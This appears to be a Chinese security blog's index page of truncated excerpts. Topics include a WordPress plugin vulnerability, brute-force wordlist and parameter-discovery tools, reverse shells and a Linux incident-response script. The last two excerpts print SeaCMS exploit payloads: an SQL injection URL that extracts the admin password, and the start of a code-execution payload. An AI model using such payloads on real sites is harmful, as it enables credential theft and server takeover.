网络安全

3月21日，研究人员披露了Social Warfare中存在的两个漏洞，这是WordPress中一个非常受欢迎的插件，可以将社交网络分享按钮添加到网站或博客中。其中，一个是存储型跨站脚本攻击（XSS）漏洞，另一个是远程代码执...

pydictor介绍 pydictor是一个强大实用的黑客暴力破解字典生成工具 破解字典生成 pydictor优点 你可以用pydictor生成普通爆破字典、基于网站内容的自定义字典、社会工程学字典等等一系列高级字典；你...

Arjun介绍 Arjun是一款HTTP参数挖掘套件。 Arjun功能介绍 多线程彻底检测支持GET / POST / JSON方法常规扫描仅需30秒基于正则表达式的启发式扫描提供了25980个可扫描的参数名只想目标发送30-5个请...

什么是反弹shell reverse shell（反弹shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念...

Linux文件一键打包命令 使用系统命令，查找相关后缀的全部文件并打包。 attention:without “&& echo ok”,the final tar -T xlsx.list -czf xlsx.tar.gz will fail -----------------打包所有的...

增长黑客试图用更巧妙的方式解答产品得以增长的奥秘，建立帮助产品增长的长效机制。他们常用的手段包括A/B测试、搜索引擎优化、电子邮件召回、病毒营销等，在此基础上，他们依赖直接营销，量化指标，场景建模，...

LinuxCheck介绍 LinuxCheck是一个linux信息搜集小脚本，主要用于应急响应，在Debian或Centos下都可使用，功能： 信息搜集（端口、网络、用户信息、登陆信息，iptables、各种环境变量或配置文件等）异常检...

体面光鲜，年薪百万的互联网巨头中层管理者们正迎来一场关于“饭碗”的凛冬。 互联网又开始裁员了？  一直在优化。默默地。  裁掉那些人或部门之后，对互联网企业有啥影响？  没啥影响。  一边是裁员，清理...

海洋CMS V8.7漏洞 payload /upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27` ...

海洋CMS v6.54漏洞 漏洞代码执行 Payload get： http://seacms.test/search.php POST： searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:let...